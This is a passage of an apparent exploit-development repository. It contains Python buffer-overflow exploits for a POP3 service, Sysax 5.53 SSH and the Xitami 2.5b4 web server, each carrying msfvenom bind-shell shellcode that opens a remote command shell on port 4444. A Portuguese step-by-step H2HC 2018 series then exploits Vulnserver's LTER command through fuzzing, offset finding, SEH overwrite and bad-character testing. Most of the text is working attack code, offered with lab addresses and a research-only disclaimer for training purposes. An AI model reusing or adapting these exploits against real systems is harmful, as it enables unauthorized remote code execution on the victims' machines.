"\x96\x8d\x75\x82\x30\x45\x2d\x6e\xc0\x8a\xa8\xe5\xce\x67\xbe" 53 | "\xa1\xd2\x76\x13\xda\xef\xf3\x92\x0c\x66\x47\xb1\x88\x22\x13" 54 | "\xd8\x89\x8e\xf2\xe5\xc9\x70\xaa\x43\x82\x9d\xbf\xf9\xc9\xc9" 55 | "\x0c\x30\xf1\x09\x1b\x43\x82\x3b\x84\xff\x0c\x70\x4d\x26\xcb" 56 | "\x77\x64\x9e\x43\x86\x87\xdf\x4a\x4d\xd3\x8f\xe4\x64\x5c\x44" 57 | "\xf4\x89\x89\xcb\xa4\x25\x62\xac\x14\x86\xd2\x44\x7e\x09\x0c" 58 | "\x74\x81\xc3\x25\x1f\x78\x84\x43\xea\x82\x40\x3c\xe8\x82\x69" 59 | "\x07\x65\x64\x03\x67\x20\x3f\xbc\x1e\x69\xcb\x5d\xde\xa7\xb6" 60 | "\x5e\x54\x44\x47\x10\x9d\x21\x5b\xc5\x6d\x7c\x01\x40\x71\xaa" 61 | "\x2d\x0e\xe0\x31\xad\x59\x19\xee\xfa\x0e\xef\xe7\x6e\xa3\x56" 62 | "\x5e\x8c\x3e\x0e\x99\x14\xe5\xf3\x24\x95\x68\x4f\x03\x85\xb4" 63 | "\x50\x0f\xf1\x68\x07\xd9\xaf\xce\xf1\xab\x19\x99\xae\x65\xcd" 64 | "\x5c\x9d\xb5\x8b\x60\xc8\x43\x73\xd0\xa5\x15\x8c\xdd\x21\x92" 65 | "\xf5\x03\xd2\x5d\x2c\x80\xe2\x17\x6c\xa1\x6a\xfe\xe5\xf3\xf6" 66 | "\x01\xd0\x30\x0f\x82\xd0\xc8\xf4\x9a\x91\xcd\xb1\x1c\x4a\xbc" 67 | "\xaa\xc8\x6c\x13\xca\xd8") 68 | 69 | buffer = "A"*2606 + jmpESP + nop 
+ shellcode + "C"*(3500-2606-4-351-16) 70 | 71 | try: 72 | print "\nSending evil buffer..." 73 | s.connect(('10.10.0.21',110)) 74 | data = s.recv(1024) 75 | s.send('USER username' +'\r\n') 76 | data = s.recv(1024) 77 | s.send('PASS ' + buffer + '\r\n') 78 | print "\nDone!." 79 | except: 80 | print "Could not connect to POP3!" 81 | -------------------------------------------------------------------------------- /exploit-sysax.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated (Using Egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/bac43012f5bd4d3092c1153b52ed3301-sysaxserv_setup5.53.msi 11 | # 12 | # PoC: 13 | # Windows XP: 14 | # - Install Sysax 5.53 (next -> next -> finish) 15 | # - Setup SSH service: "Manage Server Settings -> Configure -> Check first box" 16 | # - Open cmd.exe and type : netstat -ano | find ":4444" 17 | # Kali: 18 | # root@kali:~# pip install paramiko 19 | # root@kali:~# nc -nv 10.10.0.20 4444 20 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 21 | # Microsoft Windows XP [Version 5.1.2600] 22 | # (C) Copyright 1985-2001 Microsoft Corp. 23 | # 24 | # C:\WINDOWS\system32> 25 | # 26 | # 27 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 28 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
29 | # 30 | # Infos: 31 | # - pattern_create + pattern_offset = 9208 32 | # - pop pop ret found using mona at 0x5d9227fc of RPCNS4.dll (SafeSEH: False) 33 | # - jmp back 128 bytes = \xEB\x80 34 | # - egghunter generated with mona (egg r4f4) 35 | # - shellcode generated with msfvenom 36 | 37 | import paramiko,os,sys 38 | 39 | host = "10.10.0.20" 40 | port = 22 41 | 42 | # Size 32 Bytes 43 | # Egg = r4f4 44 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 45 | 46 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 47 | # Size = 718 bytes 48 | shellcode = "" 49 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 50 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 51 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 52 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 53 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 54 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 55 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 56 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 57 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 58 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 59 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 60 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 61 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 62 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 63 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 64 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 65 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 66 | shellcode += 
"\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 67 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 68 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 69 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 70 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 71 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 72 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 73 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 74 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 75 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 76 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 77 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 78 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 79 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 80 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 81 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 82 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 83 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 84 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 85 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 86 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 87 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 88 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 89 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 90 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 91 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 92 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 93 | shellcode += 
"\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 94 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 95 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 96 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 97 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 98 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 99 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 100 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 101 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 102 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 103 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 104 | shellcode += "\x45\x41\x41" 105 | 106 | buff = "A"*8972 + "\x90"*150 + egghunter + "\x90"*50 + "B"*2 + "\xEB\x80" + "\xFC\x27\x92\x5d" + "r4f4r4f4" + shellcode 107 | 108 | print "[+] Launching exploit..." 109 | 110 | try: 111 | transport = paramiko.Transport((host, port)) 112 | except: 113 | print "[X] Unable to connect to " + host + " on port " + str(port) 114 | sys.exit(1) 115 | 116 | transport = paramiko.Transport((host, port)) 117 | transport.connect(username = buff, password = "rafael") 118 | transport.close() 119 | 120 | print "[+] Done!" 121 | -------------------------------------------------------------------------------- /exploit-xitami.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Xitami Web Server 2.5b4 - Remote Buffer Overflow (Using Egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/c0c25ccb447057f180b1aad3110242d9-bw3225b4.exe 11 | # 12 | # PoC: 13 | # Windows XP: 14 | # - Double click Xitami 15 | # - Open cmd.exe and type : netstat -ano | find ":4444" 16 | # Kali: 17 | # root@kali:~# python exploit-xitami.py 18 | # root@kali:~# 19 | # root@kali:~# nc -nv 10.10.0.20 4444 20 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 21 | # Microsoft Windows XP [Version 5.1.2600] 22 | # (C) Copyright 1985-2001 Microsoft Corp. 23 | # 24 | # C:\Xitami> 25 | # 26 | # 27 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 28 | # Accessing a computer system or network without authorization or explicit permission is illegal. 29 | # 30 | # Infos: 31 | # - pattern_create + pattern_offset = 72 32 | # - Return Address found at 0x71A91C8B (JMP ESP) | wshtcpip.dll 33 | # - short jmp 54 bytes back opcode: \xEB\xCA 34 | # - egghunter generated with mona (egg r4f4) 35 | # - shellcode generated with msfvenom 36 | 37 | 38 | import socket 39 | import os 40 | import sys 41 | 42 | # Size = 32 bytes 43 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 44 | 45 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 46 | # Size = 718 bytes 47 | shellcode = "" 48 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 49 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 50 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 51 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 52 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 53 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 54 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 55 | shellcode += 
"\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 56 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 57 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 58 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 59 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 60 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 61 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 62 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 63 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 64 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 65 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 66 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 67 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 68 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 69 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 70 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 71 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 72 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 73 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 74 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 75 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 76 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 77 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 78 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 79 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 80 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 81 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 82 | shellcode += 
"\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 83 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 84 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 85 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 86 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 87 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 88 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 89 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 90 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 91 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 92 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 93 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 94 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 95 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 96 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 97 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 98 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 99 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 100 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 101 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 102 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 103 | shellcode += "\x45\x41\x41" 104 | 105 | Stage1 = "A"*25 + egghunter + "A"*(72-25-32) + "\x8B\x1C\xA9\x71" + "\xEB\xCA" + "r4f4r4f4" + shellcode 106 | 107 | buffer = ( 108 | "GET / HTTP/1.1\r\n" 109 | "Host: 10.10.0.20\r\n" 110 | "If-Modified-Since: pwned, " + Stage1 + "\r\n\r\n") 111 | 112 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 113 | expl.connect(("10.10.0.20", 80)) 114 | expl.send(buffer) 115 | expl.close() 116 | 
-------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | evil = "A"*4000 12 | data = "LTER /.:/" + evil 13 | 14 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | expl.connect(("10.0.0.35", 9999)) 16 | expl.send(data) 17 | expl.close 18 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 12 | 13 | evil = "A"*3000 + 
pattern 14 | data = "LTER /.:/" + evil 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("10.0.0.35", 9999)) 18 | expl.send(data) 19 | expl.close 20 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # evil = lixo + nSEH + SEH + lixo 12 | evil = "A"*3495 + "B"*4 + "C"*4 + "D"*497 13 | data = "LTER /.:/" + evil 14 | 15 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | expl.connect(("10.0.0.35", 9999)) 17 | expl.send(data) 18 | expl.close 19 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # POP POP RET encontrado em 6250120b (essfunc.dll) 12 | seh = "\x0B\x12\x50\x62" 13 | 14 | # evil = lixo + nSEH + SEH + lixo 15 | evil = "A"*3495 + "B"*4 + seh + "D"*497 16 | data = "LTER /.:/" + evil 17 | 18 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | expl.connect(("10.0.0.35", 9999)) 20 | expl.send(data) 21 | expl.close 22 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 
5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # POP POP RET encontrado em 6250120b (essfunc.dll) 12 | seh = "\x0B\x12\x50\x62" 13 | 14 | badchars=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"+ 15 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"+ 16 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"+ 17 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"+ 18 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"+ 19 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"+ 20 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"+ 21 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"+ 22 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"+ 23 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"+ 24 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"+ 25 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"+ 26 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"+ 27 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"+ 28 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"+ 29 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 30 | 31 | # evil = lixo + nSEH + SEH + lixo 32 | evil = "A"*(3495-len(badchars)) + badchars + "B"*4 + seh + "D"*497 33 | data = "LTER /.:/" + evil 34 | 35 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | expl.connect(("10.0.0.35", 9999)) 37 | expl.send(data) 38 | expl.close 39 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 
5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # POP POP RET encontrado em 6250120b (essfunc.dll) 12 | seh = "\x0B\x12\x50\x62" 13 | 14 | # Pulando 128 bytes (FF se transformará em 80) 15 | pulo = "\x4C\x4C\x77\xFF" 16 | 17 | # evil = lixo + nSEH + SEH + lixo 18 | evil = "A"*3495 + pulo + seh + "D"*497 19 | data = "LTER /.:/" + evil 20 | 21 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | expl.connect(("10.0.0.35", 9999)) 23 | expl.send(data) 24 | expl.close 25 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # POP POP RET encontrado em 6250120b (essfunc.dll) 12 | seh = "\x0B\x12\x50\x62" 13 | 14 | # Pulando 128 bytes (FF se transformará em 80) 15 | pulo = "\x4C\x4C\x77\xFF" 16 | 17 | # evil = lixo + nSEH + SEH + lixo 18 | evil = "A"*3495 + pulo + seh + "D"*497 19 | data = "LTER /.:/" + evil 20 | 21 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | expl.connect(("10.0.0.35", 9999)) 23 | expl.send(data) 24 | expl.close 25 | --------------------------------------------------------------------------------